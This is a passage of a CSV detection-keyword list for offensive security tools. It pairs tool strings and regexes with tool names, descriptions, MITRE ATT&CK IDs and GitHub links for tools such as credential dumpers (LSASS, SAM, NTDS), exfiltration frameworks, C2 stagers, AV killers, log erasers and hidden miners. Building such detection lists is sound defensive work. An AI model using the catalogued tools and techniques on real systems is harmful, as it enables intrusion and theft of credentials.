TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*:9090*/api/v1.0/relays*",".{0,1000}\:9090.{0,1000}\/api\/v1\.0\/relays.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*:CreateProcessFromParent((Get-Process ""lsass"").Id*",".{0,1000}\:CreateProcessFromParent\(\(Get\-Process\s\""lsass\""\)\.Id.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*?convert_ccache_to_kirbi*",".{0,1000}\?convert_ccache_to_kirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*?convert_kirbi_to_ccache*",".{0,1000}\?convert_kirbi_to_ccache.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*?function Invoke-CylanceDisarm*",".{0,1000}\?function\sInvoke\-CylanceDisarm.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell wrapper for a Cylance Bypass","T1055 - T1068 - T1562.001","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","8","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*?PSAmsi*PSReflect.ps1*",".{0,1000}\?PSAmsi.{0,1000}PSReflect\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*@"" ( _/_ _// 
~b33f""*",".{0,1000}\@\""\s\(\s_\/_\s\s\s_\/\/\s\s\s\~b33f\"".{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*@author 7etsuo*",".{0,1000}\@author\s7etsuo.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","6","1","N/A","N/A","N/A","N/A" "*@etc.2miners.com:*",".{0,1000}\@etc\.2miners\.com\:.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*@mitm_pattern = *",".{0,1000}\@mitm_pattern\s\=\s.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*@mitm_port = *",".{0,1000}\@mitm_port\s\=\s.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*@mitm_servers 
=*",".{0,1000}\@mitm_servers\s\=.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*@Re@mov@e-@MpTh@re@at*",".{0,1000}\@Re\@mov\@e\-\@MpTh\@re\@at.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*@redpill CS Compiled Executable*",".{0,1000}\@redpill\sCS\sCompiled\sExecutable.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*@WanaDecryptor@.exe*",".{0,1000}\@WanaDecryptor\@\.exe.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - 
T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*[ backdoor - Debug ]*",".{0,1000}\[\sbackdoor\s\-\sDebug\s\].{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*[!] Failed to enumerate Credman:*",".{0,1000}\[!\]\s\s\s\sFailed\sto\senumerate\sCredman\:.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*[!] Avoid mixing BetterXencrypt with another techniques*",".{0,1000}\[!\]\sAvoid\smixing\sBetterXencrypt\swith\sanother\stechniques.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*[!] 
Cannot enumerate domain.*",".{0,1000}\[!\]\sCannot\senumerate\sdomain\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*[!] Can't remove the HWBP-Hook for VirtualAlloc !*",".{0,1000}\[!\]\sCan\'t\sremove\sthe\sHWBP\-Hook\sfor\sVirtualAlloc\s!.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*[!] cleaning up all IOCs files to avoid detection!*",".{0,1000}\[!\]\scleaning\sup\sall\sIOCs\sfiles\sto\savoid\sdetection!.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*[!] Could not execute query. Could not bind to LDAP://rootDSE.*",".{0,1000}\[!\]\sCould\snot\sexecute\squery\.\sCould\snot\sbind\sto\sLDAP\:\/\/rootDSE\..{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*[!] 
Could not extract useful token from specified Teams database!*",".{0,1000}\[!\]\sCould\snot\sextract\suseful\stoken\sfrom\sspecified\sTeams\sdatabase!.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[!] Couldn't capture the user credential hash :*",".{0,1000}\[!\]\sCouldn\'t\scapture\sthe\suser\scredential\shash\s\:.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*[!] Couldn't communicate with the fake RPC Server*",".{0,1000}\[!\]\sCouldn\'t\scommunicate\swith\sthe\sfake\sRPC\sServer.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*[!] Couldn't communicate with the fake RPC Server*",".{0,1000}\[!\]\sCouldn\'t\scommunicate\swith\sthe\sfake\sRPC\sServer.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*[!] 
Couldn't receive the type2 message from the fake RPC Server*",".{0,1000}\[!\]\sCouldn\'t\sreceive\sthe\stype2\smessage\sfrom\sthe\sfake\sRPC\sServer.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*[!] CredBackupCredentials(*",".{0,1000}\[!\]\sCredBackupCredentials\(.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*[!] Dumping LSASS Requires Elevated Priviledges!*",".{0,1000}\[!\]\sDumping\sLSASS\sRequires\sElevated\sPriviledges!.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option*",".{0,1000}\[!\]\sDumping\sthe\sntds\scan\scrash\sthe\sDC\son\sWindows\sServer\s2019\.\sUse\sthe\soption.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*[!] 
Dynamic Sink: BAD"", L""Harness""*",".{0,1000}\[!\]\sDynamic\sSink\:\sBAD\"",\sL\""Harness\"".{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*[!] Elevated process spawned!*",".{0,1000}\[!\]\sElevated\sprocess\sspawned!.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*[!] ESTSAUTHPERSISTENT cookie was empty!*",".{0,1000}\[!\]\sESTSAUTHPERSISTENT\scookie\swas\sempty!.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[!] Failed to Create Process to Dump SAM*",".{0,1000}\[!\]\sFailed\sto\sCreate\sProcess\sto\sDump\sSAM.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[!] 
Failed to delete Performance registry key.*",".{0,1000}\[!\]\sFailed\sto\sdelete\sPerformance\sregistry\skey\..{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#contentstrings","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*[!] Failed to download legitimate GPO from SYSVOL (dc_ip:*",".{0,1000}\[!\]\sFailed\sto\sdownload\slegitimate\sGPO\sfrom\sSYSVOL\s\(dc_ip\:.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[!] Failed to enumerate ADCS data.*",".{0,1000}\[!\]\sFailed\sto\senumerate\sADCS\sdata\..{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*[!] Failed to exfiltrate using RoadTools auth file*",".{0,1000}\[!\]\sFailed\sto\sexfiltrate\susing\sRoadTools\sauth\sfile.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[!] 
Failed to fake NtOpenProcess on LSASS PID*",".{0,1000}\[!\]\sFailed\sto\sfake\sNtOpenProcess\son\sLSASS\sPID.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*[!] Failed to get LSASS handle, bailing!*",".{0,1000}\[!\]\sFailed\sto\sget\sLSASS\shandle,\sbailing!.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*[!] Failed to Kill EventLog Service*",".{0,1000}\[!\]\sFailed\sto\sKill\sEventLog\sService.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*[!] 
Failed to load shellcode into memory*",".{0,1000}\[!\]\sFailed\sto\sload\sshellcode\sinto\smemory.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*[!] Failed to parse RoadTools auth JSON file*",".{0,1000}\[!\]\sFailed\sto\sparse\sRoadTools\sauth\sJSON\sfile.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[!] Failed to Transfer LSASS Dump*",".{0,1000}\[!\]\sFailed\sto\sTransfer\sLSASS\sDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[!] Failed to write malicious scheduled task to downloaded GPO. Exiting*",".{0,1000}\[!\]\sFailed\sto\swrite\smalicious\sscheduled\stask\sto\sdownloaded\sGPO\.\sExiting.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[!] 
Feature is unsupported for PS1 rats*",".{0,1000}\[!\]\sFeature\sis\sunsupported\sfor\sPS1\srats.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*[!] Found exploitable sgid binary*",".{0,1000}\[!\]\sFound\sexploitable\ssgid\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*[!] Found exploitable Sudo NOPASSWD binary*",".{0,1000}\[!\]\sFound\sexploitable\sSudo\sNOPASSWD\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*[!] Found exploitable suid binary*",".{0,1000}\[!\]\sFound\sexploitable\ssuid\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*[!] HTTP reflected DCOM authentication failed *",".{0,1000}\[!\]\sHTTP\sreflected\sDCOM\sauthentication\sfailed\s.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*[!] inject dll into log process failure *",".{0,1000}\[!\]\sinject\sdll\sinto\slog\sprocess\sfailure\s.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*[!] Insecure resource delegations found. Exporting report:*",".{0,1000}\[!\]\sInsecure\sresource\sdelegations\sfound\.\sExporting\sreport\:.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*[!] Insecure trustee delegations found. Exporting report: *",".{0,1000}\[!\]\sInsecure\strustee\sdelegations\sfound\.\sExporting\sreport\:\s.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*[!] Invalid Exfil Method Chosen! 
Data Will Not Be Sent!*",".{0,1000}\[!\]\sInvalid\sExfil\sMethod\sChosen!\sData\sWill\sNot\sBe\sSent!.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*[!] Invalid sandbox evasion technique provided!*",".{0,1000}\[!\]\sInvalid\ssandbox\sevasion\stechnique\sprovided!.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[!] Invalid sandbox evasion technique provided!*",".{0,1000}\[!\]\sInvalid\ssandbox\sevasion\stechnique\sprovided!.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[!] 
It was not possible to retrieve GPO Policies*",".{0,1000}\[!\]\sIt\swas\snot\spossible\sto\sretrieve\sGPO\sPolicies.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*[!] Looks like Victim * doesn't have office365 Licence!*",".{0,1000}\[!\]\sLooks\slike\sVictim\s.{0,1000}\sdoesn\'t\shave\soffice365\sLicence!.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*[!] Modifialbe scheduled tasks were not evaluated due to permissions*",".{0,1000}\[!\]\sModifialbe\sscheduled\stasks\swere\snot\sevaluated\sdue\sto\spermissions.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently, only the most common checks have been ported; no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege 